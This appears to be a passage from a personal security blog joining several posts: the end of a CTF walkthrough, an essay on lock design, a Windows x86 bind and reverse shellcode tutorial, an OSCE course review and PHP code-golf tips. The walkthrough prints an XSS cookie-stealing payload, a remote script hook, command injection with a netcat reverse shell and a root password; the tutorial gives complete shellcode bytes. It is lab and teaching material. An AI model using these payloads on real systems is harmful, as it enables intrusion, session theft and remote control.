root@kali:~# curl -i -d "username=test4&password=test4&dna_string=<svg/onload=\"var x=document.createElement('img');x.src='http://192.168.0.34/'%2Bdocument.cookie;document.body.appendChild(x);\">" http://192.168.0.36/dnanalyzer/api/register.php

We see no cookies in the request sent back to us. This could mean that there are no cookies, but that would be weird because there is a login, which indicates sessions. What is more probable is the use of httponly flag on the cookies, or that the site uses session tokens sent via headers.

root@kali:~# nc -nlvp 80
GET / HTTP/1.1
Host: 192.168.0.34
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/dnanalyzer/portal/index.php
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

Proxy via XSS

However, there is another trick we can use. We can use a tool called mygg.js to use XSS to browse through the admin’s browser to take a look at the site via their authenticated session. Follow the basic installation at https://github.com/dsolstad/mygg.js and edit the configuration in the top section of the file. Change the domain variable to your attacking IP address before starting it with $ node mygg.js. After this we can change the XSS payload and use mygg’s hook instead.

root@kali:~# curl -i -d "username=test4&password=test&dna_string=<svg/onload=\"var x=document.createElement('script');x.src='http://192.168.0.34/hook.js';document.head.appendChild(x);\">" http://alphonse/dnanalyzer/api/register.php

After some minutes we can see that we have a new hooked browser in the console of mygg. We also see which URL it was hooked from.

root@kali:~# node mygg.js
[+] Payload stager:
<svg/onload="var x=document.createElement('script');x.src='//192.168.0.34/hook.js';document.head.appendChild(x);">

[+] Proxy server listening on address 127.0.0.1 port 8081
[+] HTTP server listening on address 0.0.0.0 port 80
[+] HTTPS server listening on address 0.0.0.0 port 443
[+] Hooked new browser [192.168.0.36][Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0][http://127.0.0.1/dnanalyzer/portal/index.php]

Now, change the proxy settings in your attacking web browser to 127.0.0.1:8081 and browse to http://127.0.0.1/dnanalyzer/portal/index.php and you should be logged in!

Note that since the victim is browsing the web portal via the 127.0.0.1 interface, we also need to use localhost to comply with Same Origin Policy and to be able to read the answers from the victim’s browsing.

Also, take note that we see no cookies defined, but we are riding on the victim’s cookie.

What we see in the admin panel is what appears to be a button to analyse the user provided DNA strings. Hit Ctrl+Shift+I to bring up the Web Developer toolbar to view the request to the API. Instead of using our attacking browser going forward, we can now switch to using curl via mygg.js to play around with the request.

root@kali:~# curl -i -x 127.0.0.1:8081 -d '{"id":"6","val":"GATC"}' http://127.0.0.1/dnanalyzer/portal/analyze_dna.php
HTTP/1.1 200 OK
cache-control: no-store, no-cache, must-revalidate
connection: Keep-Alive
content-type: text/html; charset=UTF-8
date: Fri, 18 Sep 2020 21:26:10 GMT
expires: Thu, 19 Nov 1981 08:52:00 GMT
keep-alive: timeout=5, max=100
pragma: no-cache
server: Apache/2.4.38 (Debian)
Content-Length: 6

Superb
root@kali:~# 

Command execution

Very soon we will find out that we can execute OS commands simply by ending the DNA string and appending a command. Probably because API sends the data directly to a binary for analysis.

root@kali:~# curl -i -x 127.0.0.1:8081 -d '{"id":"6","val":"GATC; ls"}' http://127.0.0.1/dnanalyzer/portal/analyze_dna.php
HTTP/1.1 200 OK
cache-control: no-store, no-cache, must-revalidate
connection: Keep-Alive
content-type: text/html; charset=UTF-8
date: Fri, 18 Sep 2020 21:43:39 GMT
expires: Thu, 19 Nov 1981 08:52:00 GMT
keep-alive: timeout=5, max=100
pragma: no-cache
server: Apache/2.4.38 (Debian)
Content-Length: 9

index.php
root@kali:~# 

We can easily get a reverse shell from here.

root@kali:~# curl -i -x 127.0.0.1:8081 -d '{"id":"6","val":"GATC; nc 192.168.0.34 1337 -e /bin/bash"}' http://127.0.0.1/dnanalyzer/portal/analyze_dna.php

root@kali:~# nc -nlvp 1337
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We snatch the local flag:

cat /home/alphonse/flag.txt
dmx2urv87f2

Priv Esc

After digging around on the machine, we find something interesting in the /home/alphonse/Documents folder. There is a binary with suid bit which asks for a password.

ls -l
total 20
-rwsr-xr-x 1 root root 16976 Sep  3  2019 rootme
./rootme asdf
Wrong password

Let’s see if we can see the password in clear text in the binary. Usually I’d use strings for this, but it doesn’t seem to be installed. However, we can use xxd ./rootme instead, where we find:

00002000: 0100 0200 2e2f 726f 6f74 6d65 203c 7061  ...../rootme <pa
00002010: 7373 776f 7264 3e00 614e 6867 4b69 3478  ssword>.aNhgKi4x
00002020: 754f 0048 6572 6520 796f 7520 676f 3a00  uO.Here you go:.
00002030: 6261 7368 002f 6269 6e2f 7368 0057 726f  bash./bin/sh.Wro
00002040: 6e67 2070 6173 7377 6f72 6400 011b 033b  ng password....;

./rootme aNhgKi4xuO
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/flag.txt
91bmZfpe2L

Bingo!

Summary

Alphonse is a workstation used for local development and unfortunately he was sharing an Android application through an open FTP server. By reverse engineering this, we learned about an API that was vulnerable to blind XSS, triggered by a visitor on an admin panel. Since the session cookies were protected, we used a tool to ride the authenticated user’s session and proxying our attacking web browser through the victim’s web browser. From here we learned about another API that communicated with a binary on the OS, which was vulnerable to OS command injection. The final step was to abuse another binary to achieve root privileges.

The Rorschach Test of Information Security

Sun, 10 May 2020 00:00:00 +0000

I follow a lot of information security professionals on LinkedIn, and some weeks ago I saw a post with an image in my feed. I will give you a moment take a look yourself before reading on.

The image followed a text saying that unlocking one lock will unlock the whole thing, and then drawing a parallel to cyber security, where an attacker would only need to compromise one system to gain access to an organization. This is indeed correct for the picture, but let’s try to look at this with a non-security tunnel vision mindset.

First off, let’s try to understand what these locks are protecting. It seems to be some sort of outdoor gate to reach a restricted area. The locks are of different kind and are numbered, suggesting there is one unique key for each lock. By example we can imagine that it’s a gate to access a private zone with multiple holiday houses, and the gate is to access it by car, with each household having their own unique key.

Decentralized system

We can simplify the above image by replacing it with the following:

The same principle applies - if you break one lock, you break the whole chain, thus opening the gate. If a new person would need access to this restricted area, that person would need to get in touch with one of the key holders to open their lock, and the new person would add their lock to the chain. This new person could be an owner of a new house built in the restricted zone, or even the fire department. If anyone would lose their key, the person would buy a new lock and get in touch with anyone of the key holders to unlock the chain and to add the new lock. All this at a low cost and without a central key administration.

Another key point here is that if anyone forgets to lock the gate, it becomes evidently who was responsible.

Centralized system

Now we can look at the opposite principle, with one lock and multiple cloned keys, one for each household, like the image below illustrates.

If a new house owner would need access, they would need to apply to get a new cloned key. This could take some time and they might need to go far away to get the new key. If someone loses their key, the administration would need to change the lock, clone new keys and locate households to distribute the new keys. Very cost and time inefficient.

You can argue that in this example the central administration could already have cloned keys ready for new households, and if someone loses their key, the administration wouldn’t really care that much and just give them a new key. However, this might not be the case in other examples, where the lock is protecting something of more value.

The bottom line is: Avoid tunnel vision - Try to think from multiple perspectives, be more agile, and think about that it could be a reason for why things are like they are.

Tutorial - Writing Hardcoded Windows Shellcodes (32bit)

Sun, 02 Feb 2020 00:00:00 +0000

This article is a walkthrough on how to write shellcodes for Windows, both reverse and bind. I was doing the SLAE32 course from PentesterAcademy, which targets Linux, but I wanted to create shellcodes for Windows too. I found very little information about this online, but after much debugging, trying and failing I successfully made it. The shellcodes have been on my Github for a while, but I wanted to explain them more in detail, thus this article was created. Note that I assume the reader already have basic x86 Assembly and socket knowledge before reading further.

You will notice that the shellcodes presented in this article are respectively 92 (reverse) and 111 (bind) bytes long. You might be wondering why Windows shellcodes from msfvenom is about 300-400 bytes in comparison. This is because the payloads from msfvenom will work on any Windows version. It has extra code that will automatically find addresses for DLLs and system calls, which is different on every Windows release. The shellcodes in this article has hardcoded addresses, which will only work for one Windows version, which in this guide will be for Windows XP SP3 (eng). Why not just stick to shellcodes from msfvenom? Most often you will have enough space for your payload and you can use a shellcode from msfvenom, but in some cases you won’t have enough space, so unless you find a small hardcoded shellcode for your target system, you need to create your own. If you are interesting in learning how to write shellcodes that automatically finds the necessary addresses, like those from msfvenom, you can read this amazing article.

By the way, I’m no expert in Assembly and shellcoding - If you find something wrong, please let me know!

Prework: Finding system calls, DLLs and addresses

Before continuing, you should have a copy of the target Windows version ready that we will be using for debugging.

The steps in this guide is basically loading DLLs containing the system calls we require, and then calling each system call one by one. To figure out the needed DLLs, we first need to know which system calls we will be using. Since we are going to create sockets, we already know that we will be using system calls, such as bind() and listen(). A quick Google search on “bind socket microsoft” gives us the following documentation: https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-bind

If we scroll down, we learn that bind() is located in ws2_32.dll. Now we can use the tool Arwin.exe on the target system to figure out the address of the various system calls.

> arwin.exe ws2_32.dll bind
arwin - win32 address resolution program - by steve hanna - v.01
bind is located at 0x71ab4480 in ws2_32.dll

> arwin.exe ws2_32.dll listen
arwin - win32 address resolution program - by steve hanna - v.01
listen is located at 0x71ab8cd3 in ws2_32.dll

We also know that we are required to load this DLL, at least at this stage, and a Google search reveals the LoadLibraryA() system call: https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya, which is found in kernel32.dll:

> arwin.exe kernel32.dll LoadLibraryA
arwin - win32 address resolution program - by steve hanna - v.01
LoadLibraryA is located at 0x7c801d7b in kernel32.dll

If we continue this process, we have compiled a table of relevant system calls and their addresses:

ws2_32.dll:       
  closesocket()           71AB3E2B
  accept()                71AC1040
  listen()                71AB8CD3
  bind()                  71AB4480
  connect()               71AB4a07
  WSASocketA()            71AB8B6A
  WSAStartup()            71AB6a55
  WSAGetLastError()       71AB3CCE

kernel32.dll:
  LoadLibraryA()          7C801D7B
  ExitProcess()           7C81CAFA
  WaitForSingleObject()   7C802530
  CreateProcessA()        7C80236B
  SetStdHandle()          7C81D363

msvcrt.dll:       
  system()                77C293C7

Shellcoding in general

I won’t go in depths about shellcoding in general here, but when you write shellcode, you need to take certain precautions that you wouldn’t normally think about when writing traditional assembly code. For instance, hardcoding null bytes (0x00) will terminate strings and will most certain break the code. Also, you can’t store strings like you would normally. Instead you can use tricks, such as jmp-call-pop or pushing strings on the stack or to registers. I will explain where I do tricks to mitigate null bytes throughout the article.

Building the bindshell (port 4444)

To create the bindshell, we will call a series of system calls, which we will go through below, against the Windows API. In case you are not familiar with Windows system calls, the basic idea is to fill up the stack with arguments before calling the function at the given address, referenced in the table created earlier.

We want our first version of the shellcode to work as a standalone executable to better understand if it’s working or not, before stripping away unnecessary parts. Also note that the size of the following shellcode can be reduced further, but I have purposely made it a little bigger for readability and flexibility. For example, pointers to strings are pushed on the stack instead of using the jmp-call-pop method to avoid jumps in the code.

System call: LoadLibraryA

Documentation: https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya

Syntax:

LoadLibraryA(_In_ LPCTSTR lpFileName)

This system call loads a DLL file into the memory. It takes one argument, which is the name of the file.

xor eax, eax        ; Clear eax
mov ax, 0x3233      ; Store string "32" in AX (explanation below)
push eax            ; Push string "32\0\0" on stack
push 0x5f327377     ; Push string "ws2_" on stack
push esp            ; Push addr of "ws2_32\0\0" on stack, which will be the lpFileName argument
mov eax, 0x7c801d7b ; Address to LoadLibraryA()
call eax

A trick was used here to insert null bytes to terminate the “ws2_32” string, without actually writing a null byte. The mov ax, 0x3233 operation stores the string “32” in the lowest 16 bits of EAX (AX). The highest 16 bits are filled with 0x00 (due to the previous xor eax, eax operation). This will nicely terminate the string without us needing to hardcode a null byte in the code. If we would have done the following instead, which is more rational, it would have broken the shellcode:

Assembly:

push 0x00003233 ; "32\0\0"
push 0x5f327377 ; "ws2_"

Notice the nulls in pure hex bytes:

6833320000687773325F

This LoadLibraryA() system call is very straight forward. The stack looks like the following before call eax, where a pointer to the filename string is on the top of the stack, as the first and only argument:

   Addr        Value
   00000001    00000002 -----------------
-> 00000002    00003233 (ASCII 32\0)    |
|  00000003    5f327377 (ASCII ws2_)    |
|                                       |
-----------------------------------------

System call: WSAStartup

Documentation: https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-wsastartup
Documentation: https://docs.microsoft.com/en-us/windows/win32/api/winsock/ns-winsock-wsadata

Syntax:

WSAStartup(WORD wVersionRequired, LPWSADATA lpWSAData)

The next system call we need to run is WSAStartup() to initialize the use of sockets. It takes two arguments, where the first is the version we are going to use and the second is a pointer to a place to store socket data.

add esp, 0xFFFFFE70 ; Creating space for WSAData (400 bytes)
push esp            ; Arg2 (lpWSAData) = pointer to WSAData space
push 0x101          ; Arg1 (wVersionRequired) = 1.1
mov eax, 0x71ab6a55 ; Address to WSAStartup()
call eax

The first instruction is add esp, 0xFFFFFE70, which is a way of creating space (400 bytes) on the stack without generating null bytes. The normal way of achieving this would be to subtract a value from ESP (remember the stack grows downwards). However, this results in null bytes:

nasm > sub esp, 0x190
00000000  81EC90010000      sub esp,0x190

I’m not sure why this trick works, but by inverting the logic it solves our problem: 0xFFFFFFFF - 0xFFFFFE70 = 0x18F = 399

System call: WSASocketA

Documnetation: https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsasocketa

Syntax:

WSASocketA(int af, int type, int protocol, LPWSAPROTOCOL_INFOA lpProtocolInfo, GROUP g, DWORD dwFlags)

Now we need to create a socket. This function takes a few parameters, like information about the socket type.

xor eax, eax         ; Clear eax
push eax             ; Arg6 (dwFlags) = 0
push eax             ; Arg5 (g) = 0
push eax             ; Arg4 (lpProtocolInfo) = 0
push eax             ; Arg3 (protocol) = 0 = IPPROTO_TCP
push 0x1             ; Arg2 (type) = 1 = SOCK_STREAM
push 0x2             ; Arg1 (af) = 2 = AF_INET
mov eax, 0x71AB8B6A  ; Address to WSASocketA()
call eax
mov ebx, eax 

The pointer to the socket handler will be stored in eax, which we copy into ebx to reference later.

System call: bind

Documentation: https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-bind
Documnetation: https://docs.microsoft.com/en-us/windows/win32/winsock/sockaddr-2

Syntax:

bind(SOCKET s, const sockaddr *addr, int namelen)

Next up we need to bind the socket. The first argument is the pointer to the socket handler, which we have stored in EBX. The second argument should be a pointer to these three values:

The port number, which in this case will be 4444 (0x5c11)
The address family. For IPv4 it should be set to AF_INET (0x0002)
The IP address it will listen on, which we will set to INADDR_ANY (0x0000) to make the socket listen on all interfaces.

These values will look like the following:

5c110002
00000000

The third argument is the size of the second argument, which will be 16 bytes (0x10 in hex).

Notice that there are null bytes in the value for AF_INET (0x0002). This can be solved by storing 0x5c110102 in EAX and doing dec ah, which will only decrement the AH section of EAX by one.

Explanation:

eax = 0x5c110102
ax = 0x0102 (lowest 16 bits of eax)
al = 0x02 (lowest 8 bits of ax)
ah = 0x01 (highest 8 bits of ax)

xor eax, eax         ; Clear eax
push eax             ; Push 0 on the stack to define INADDR_ANY.
mov eax, 0x5c110102 
dec ah               ; eax: 0x5c110102 -> 0x5c110002 (Mitigating null byte)
push eax             ; Push 0x5c110002 on stack
mov eax, esp         ; Since the 2nd arg is expected to be a pointer, we store the pointer to 0x5c110002 in eax
push 0x10            ; Arg3 (namelen) = 16 bytes
push eax             ; Arg2 (*addr) = eax -> 0x5c110002 (5c11 = 4444, 0002 = AF_INET)
push ebx             ; Arg1 (s) = WSASocket() handler
mov eax, 0x71AB4480  ; Address to bind()
call eax

The stack looks like this right before calling bind():

   Addr        Value
   00000001    00000064 (Arg1, SOCKET s)
   00000002    00000004 (Arg2, const sockaddr *addr) ---
   00000003    00000010 (Arg3, int namelenn)            |
-> 00000004    5c110002                                 |
|  00000005    00000000 (INADDR_ANY)                    | 
--------------------------------------------------------

To make the *addr argument more clear, here is what it would look like in C:

struct in_addr {
  union {
    struct {
      u_char s_b1;
      u_char s_b2;
      u_char s_b3;
      u_char s_b4;
    } S_un_b;
    struct {
      u_short s_w1;
      u_short s_w2;
    } S_un_w;
    u_long S_addr;
  } S_un;
};

struct sockaddr_in {
        short   sin_family;
        u_short sin_port;
        struct  in_addr sin_addr;
        char    sin_zero[8];
};

struct sockaddr_in server;
server.sin_family = AF_INET;           # 0x0002
server.sin_addr.s_addr = INADDR_ANY;   # 0x00000000
server.sin_port = htons(4444);         # 0x5c11

System call: listen

Documentation: https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-listen

Syntax:

listen(SOCKET s, int backlog)

To get incoming connections, we need to call the listen() function, which is very simple to implement.

push 0x1             ; Arg2 (backlog) = 1         
push ebx             ; Arg1 (s) = WSASocket() handler
mov eax, 0x71AB8CD3  ; Address to listen()   
call eax

System call: accept

Documentation: https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-accept

Syntax:

accept(SOCKET s, sockaddr *addr, int *addrlen)

As the docs says, “The accept function permits an incoming connection attempt on a socket”. We need to store the return value here, which gets stored in EAX. We store a copy in EBX for later use.

xor eax, eax         ; Clear eax
push eax             ; Arg3 (addrlen) = 0
push eax             ; Arg2 (*addr) = 0
push ebx             ; Arg1 (s) = WSASocket() handler
mov eax, 0x71AC1040  ; Address to accept()
call eax
mov ebx, eax         ; Store accept() handler

Now finally we have the socket up and running. Time to implement the shell part.

System call: SetStdHandle

Docs: https://docs.microsoft.com/en-us/windows/console/setstdhandle

Syntax:

SetStdHandle(_In_ DWORD nStdHandle, _In_ HANDLE hHandle)

We will call this function three times to set STD_INPUT, STD_OUTPUT and STD_ERROR to the accepted socket connection.

mov edx, 0x7c81d363  ; Address to SetStdHandle()

push ebx             ; Arg2 (hHandle) = accept() handler
push 0xfffffff6      ; Arg1 (nStdHandle) = -0A (STD_INPUT)
call edx
          
push ebx             ; Arg2 (hHandle) = accept() handler
push 0xfffffff5      ; Arg1 (nStdHandle) = -0B (STD_OUTPUT)
call edx
          
push ebx             ; Arg2 (hHandle) = accept() handler          
push 0xfffffff4      ; Arg1 (nStdHandle) = -0C (STD_ERROR)
call edx

System call: system

Documentation: https://docs.microsoft.com/en-us/cpp/c-runtime-library/reference/system-wsystem?view=vs-2019

Syntax:

system(const char *command)

The final system call we need to call is the actual execution of OS commands. It takes one argument which is the a pointer to a command string. If you remember earlier, we had to deal with a filename string needed to be terminated with a null byte. Here we will also do some maneuvering to mitigate null bytes in the code.

mov DWORD [esp-0x5], 0x646d6341   ; Store string "Acmd" 5 bytes from top of stack
lea eax, [esp-0x4]                ; Store pointer to the string "cmd\0" in eax
lea esp, [esp-0x4]                ; Manually update esp
push eax                          ; Arg1 (*command) = Pointer to "cmd\0"
mov eax, 0x77c293c7               ; Address to system()
call eax

This is the stack and registers for each operation:

Starting state, where ESP points to the *addr structure from the bind() function.

       Addr        Value
       0022FE1C    FFFFFFF4
       0022FE20    00000000
ESP -> 0022FE24    5C110002
       0022FE28    00000000

After mov DWORD [esp-0x5], 0x646d6341, the string “Acmd” is placed 5 bytes from ESP. Since the string only use 3 bytes of the “row” with only zeros, we have a clean null terminated “cmd” string on the stack.

       Addr        Value      Ascii
       0022FE1C    41FFFFF4   "...A"
       0022FE20    00646D63   "cmd\0"
ESP -> 0022FE24    5C110002
       0022FE28    00000000

lea eax, [esp-0x4] stores a pointer to the “cmd\0” string in EAX.

       Addr        Value      Ascii
       0022FE1C    41FFFFF4   "...A"
EAX -> 0022FE20    00646D63   "cmd\0"
ESP -> 0022FE24    5C110002
       0022FE28    00000000

lea esp, [esp-0x4] adjusts ESP, or else data will be overwritten when we push more values on the stack.

           Addr        Value      Ascii
           0022FE1C    41FFFFF4   "...A"
ESP/EAX -> 0022FE20    00646D63   "cmd\0"
           0022FE24    5C110002
           0022FE28    00000000

push eax pushes the address of the “cmd\0” string on the stack and overwrites the previous trash there.

       Addr        Value      Ascii
ESP -> 0022FE1C    0022FE20   
EAX -> 0022FE20    00646D63   "cmd\0"
       0022FE24    5C110002
       0022FE28    00000000

Below is an alternative version of system(), which saves some bytes using EBP instead of ESP. We save space because we don’t need to update the value of EBP, like we did to ESP in the previous example. The reason I use ESP instead is that EBP might get overwritten by the exploit.

mov DWORD [ebp-0x5], 0x646d6341
lea eax, [ebp-0x4]
push eax
mov eax, 0x77c293c7
call eax

The complete bind shell code

[BITS 32]

global _start

section .text

_start:

; LoadLibraryA(_In_ LPCTSTR lpFileName)
xor eax, eax
mov ax, 0x3233
push eax            ; Push 0x00003233 (ASCII 32\0)
push 0x5f327377     ; Push 0x5f327377 (ASCII ws2_)
mov ebx, esp        ; Store pointer to "ws2_32" in ebx
push ebx            ; Arg lpFileName = ebx -> "ws2_32"
mov eax, 0x7c801d7b
call eax

; WSAStartup(WORD wVersionRequired, LPWSADATA lpWSAData)
add esp, 0xFFFFFE70 ; Creating space on stack (400 bytes)
push esp            ; Arg lpWSAData = top of stack
push 0x101          ; Arg wVersionRequired = 1.1
mov eax, 0x71ab6a55
call eax

; WSASocketA(int af, int type, int protocol, 
;            LPWSAPROTOCOL_INFOA lpProtocolInfo, 
;            GROUP g, DWORD dwFlags)
xor eax, eax
push eax             ; Arg dwFlags = 0
push eax             ; Arg g = 0
push eax             ; Arg lpProtocolInfo = 0
push eax             ; Arg protocol = IPPROTO_TCP
push 0x1             ; Arg type = SOCK_STREAM
push 0x2             ; Arg af = AF_INET
mov eax, 0x71AB8B6A
call eax
mov ebx, eax         ; Store WSASocket() handler

; bind(SOCKET s, const sockaddr *addr, int namelen)
xor eax, eax
push eax             ; Creating space on stack
mov eax, 0x5c110102 
dec ah               ; eax: 0x5c110102 -> 0x5c110002 (Mitigating null byte)
push eax             ; Store the portnr on stack
mov eax, esp         ; Store pointer to the portnr
push 0x10            ; Arg namelen = 16 bytes
push eax             ; Arg *addr = eax -> 0x5c110002 (5c11 = 4444, 0002 = INET_AF)
push ebx             ; Arg s = WSASocket() handler
mov eax, 0x71AB4480
call eax

; listen(SOCKET s, int backlog)
push 0x1             ; Arg backlog = 1         
push ebx             ; Arg s = WSASocket() handler
mov eax, 0x71AB8CD3       
call eax

; accept(SOCKET s, sockaddr *addr, int *addrlen)      
xor eax, eax
push eax             ; Arg addrlen = 0
push eax             ; Arg *addr = 0
push ebx             ; Arg s = WSASocket() handler
mov eax, 0x71AC1040
call eax
mov ebx, eax         ; Store accept() handler

; SetStdHandle(_In_ DWORD nStdHandle, _In_ HANDLE hHandle)
mov edx, 0x7c81d363

push ebx             ; Arg hHandle = accept() handler
push 0xfffffff6      ; Arg nStdHandle = -0A (STD_INPUT)
call edx
          
push ebx             ; Arg hHandle = accept() handler
push 0xfffffff5      ; Arg nStdHandle = -0B (STD_OUTPUT)
call edx
          
push ebx             ; Arg hHandle = accept() handler          
push 0xfffffff4      ; Arg nStdHandle = -0C (STD_ERROR)
call edx

; system(const char *command)
mov DWORD [esp-0x5], 0x646d6341   ; Store string "Acmd" 5 bytes from top of stack
lea eax, [esp-0x4]                ; Store pointer to the string "cmd\0" in eax
lea esp, [esp-0x4]                ; Manually update esp
push eax                          ; Arg *command = eax -> "cmd"
mov eax, 0x77c293c7
call eax

Compilation

Time to compile this thing. This can be done on Windows by downloading the following tools:

> nasm.exe -f win32 -o bind.obj bind.asm
> ld.exe bind.obj -o bind.exe

Or you can cross-compile this on a Linux box:

$ nasm -f win32 bind.asm -o bind.o
$ ld -m i386pe bind.o -o bind.exe

Verify standalone executable

Simply double click on the executable and a cmd terminal will appear.

Connect to it using netcat and we got a shell!

If we were going to use the shellcode as a payload for an exploit, then we can easily reduce the size by removing the code to load the socket library (LoadLibraryA()) and the socket startup call (WSAStartup()). This is because the target vulnerable software probably has already loaded the ws2_32.dll library and ran a socket startup call. This can be confirmed with the following command, which will display all loaded DLLs by the executable:

> tasklist.exe /m /fi "imagename eq vulnerable.exe"

Exploitation ready bind shell (111 bytes)

Compiled without LoadLibraryA() and WSAStartup().

$ for i in $(objdump -d shell.exe | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
\x31\xc0\x50\x50\x50\x50\x6a\x01\x6a\x02\xb8\x6a\x8b\xab\x71\xff\xd0\x89\xc3\x31
\xc0\x50\xb8\x02\x01\x11\x5c\xfe\xcc\x50\x89\xe0\x6a\x10\x50\x53\xb8\x80\x44\xab
\x71\xff\xd0\x6a\x01\x53\xb8\xd3\x8c\xab\x71\xff\xd0\x31\xc0\x50\x50\x53\xb8\x40
\x10\xac\x71\xff\xd0\x89\xc3\xba\x63\xd3\x81\x7c\x53\x6a\xf6\xff\xd2\x53\x6a\xf5
\xff\xd2\x53\x6a\xf4\xff\xd2\xc7\x44\x24\xfb\x41\x63\x6d\x64\x8d\x44\x24\xfc\x8d
\x64\x24\xfc\x50\xb8\xc7\x93\xc2\x77\xff\xd0

111 bytes. No null bytes. Beautiful, isn’t it?

Building the reverse shell (port 4444)

For the reverse shell, we will reuse a lot from the bind shell code. In fact, we are just going to replace bind(), listen() and accept() with connect().

System call: connect

Documentation: https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-connect

Syntax:

connect(SOCKET s, const sockaddr *name, int namelen)

The connect system call connects to a socket. It takes three arguments and looks more or less like bind().

push 0x8201A8C0      ; Remote IP address, 192.168.1.130   
mov eax, 0x5c110102  ; Port nr, 4444 (first 2 bytes) 
dec ah               ; eax: 0x5c110102 -> 0x5c110002 (Mitigating null byte)
push eax             ; Store portnr on stack
mov esi, esp         ; Store pointer to portnr
xor eax, eax         ; Clear eax
mov al, 0x10         ; Makes eax = 0x00000010
push eax             ; Arg3 (namelen) = 16 bytes
push esi             ; Arg2 (*name) = esi -> 0x5c110002 (5c11 = 4444, 0002 = INET_AF)
push ebx             ; Arg1 (s) = WSASocket() handler
mov eax, 0x71ab4a07  ; Address to connect()
call eax

The logic for the remote IP address is the following:

Exploitation ready reverse shell (92 bytes)

Compiled without LoadLibraryA() and WSAStartup().

$ for i in $(objdump -d reverse.exe | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
\x31\xc0\x50\x50\x50\x50\x6a\x01\x6a\x02\xb8\x6a\x8b\xab\x71\xff\xd0\x89\xc3\x68
\xc0\xa8\x38\x01\xb8\x02\x01\x11\x5c\xfe\xcc\x50\x89\xe6\x31\xc0\xb0\x10\x50\x56
\x53\xb8\x07\x4a\xab\x71\xff\xd0\xba\x63\xd3\x81\x7c\x53\x6a\xf6\xff\xd2\x53\x6a
\xf5\xff\xd2\x53\x6a\xf4\xff\xd2\xc7\x44\x24\xfb\x41\x63\x6d\x64\x8d\x44\x24\xfc
\x8d\x64\x24\xfc\x50\xb8\xc7\x93\xc2\x77\xff\xd0

Highly recommended read about shellcoding: http://www.hick.org/code/skape/papers/win32-shellcode.pdf

Offensive Security CTP/OSCE Review

Thu, 25 Oct 2018 00:00:00 +0000

After I woke up on October the 16th, I had a new unread email from Offensive Security in my inbox. It was a perfect start of the day knowing that I had passed the horrifying 48 hour OSCE exam. Overall, Cracking the Perimeter was a great course. It was a hard journey and I learned a lot, especially about assembly, shellcoding and buffer overflows. I’m not saying that the course is only about buffer overflows, but out of the nine modules, you are staring at assembly code in a debugger in six of them. The three other modules were about advanced web and man-in-the-middle network attacks, which was really good and I wanted more of.

Before I enrolled in the course I expected it to be more like PWK/OSCP, but harder, like penetration testing, but on a more advanced level. Instead it feels like a course for exploitation research. However, it is nothing wrong about that, and I truly believe that almost everything you do in computing will aid your experience as a penetration tester.

If you blindly compare PWK and CTP (which is not actually fair), then the latter comes out short. This is primarily due to the minimal lab environment, where CTP doesn’t have a lab like PWK, filled with machines for you to exploit. The CTP lab consists only of 3-4 machines used for developing exploits for the modules. The course is also more expensive, costing $400 USD more than PWK, but it is still worth every penny in my opinion.

The course content is not that big and you should seek information and hands-on practice outside the official material itself. Corelan and FuzzySecurity are extremely good resources for this. Also consider sharpening up your assembly and shellcoding skills before enrolling into the course.

Lastly, I want to say that the course might be old, and many techniques covered won’t work with modern operating systems and new anti malware solutions. However, you should always learn the fundamental principles before exploring advanced techniques.

Now back to the waiting room for AWE/OSCEE and AWAE/OSWE to come as online courses.

Tips and Tricks when Golfing in PHP

Tue, 01 May 2018 00:00:00 +0000

Code golfing is about creating the shortest code, in bytes, to solve a given problem, in a specific language or free of choice. It would be the opposite of this.

Examples of on-going challenges:

This guide was originally written by JWvdVeer and Wim for phpGolf.org. I have done some editing and fine tuning before releasing it again here. Although this guide is written for PHP version 5.3.3, the same principles still applies today, but does not include things like e.g. short array syntax. This is not an exhausting list of all tricks, but these might be the most important ones. The examples in the guide are not meant as the optimal solution for the given problem, but to show off the trick in question. The code written in the guide expects that error reporting is set to E_ALL & ~E_NOTICE.

I have also added some of the most impressive submissions on phpGolf.org down below to take inspiration from.

General Tips

PHP behaves in a consistent way, so you can always predict the outcome of the code. Sometimes you might even exploit known odd behavior of PHP.
Know the environment your code will run in. Most challenges have error_reporting E_ALL & ~E_NOTICE. So notices about functions being deprecated or undefined array indexes are accepted.
Use Google. Some challenges are copies of other challenges on the Internet. Or they are much the same. So you can get some inspiration of sometimes complete challenges.
Most of the time the less variables you use will result in a smaller solution in bytes. Ask yourself these questions: Do I really need them, or might the value of this variable also be derived from any other variable? Can I combine two values into one in order to save even 1 byte?

Numbers

Instead of writing 1000 you can write 1e3. 1000000 would be 1e6 etc.

Strings

A lot of space can be saved when dealing with strings.

Substrings

Substrings can be accessed like arrays, which means that you can do this:

<?$a="abc";echo$a[1]; # prints "b"

instead of this:

<?$a="abc";echo substr($a,1,1); # prints "b"

String inversion

Many strings doesn’t need to be quoted when notices are turned off (~E_NOTICE), which means that that the following will work, thus saving 2 bytes:

<?$a=HELLO;

This will however not work:

<?$a=HELLO WORLD;

If you have a string with whitespace or characters that needs to be quoted, you can invert the string.

This code prints a newline, using 8 bytes:

<?="\n";

This does the same thing using 7 bytes:

<?="
";

And finally this does also the same, but using 6 bytes:

<?=~õ;

Regular expressions are a good example of a kind of strings you can save bytes on using this trick.

Instead of doing this:

<?=preg_filter('#(.)\1+#i','$1','Aa striing  wiith soomee reeduundaant chaars');

You could save 2 bytes doing this:

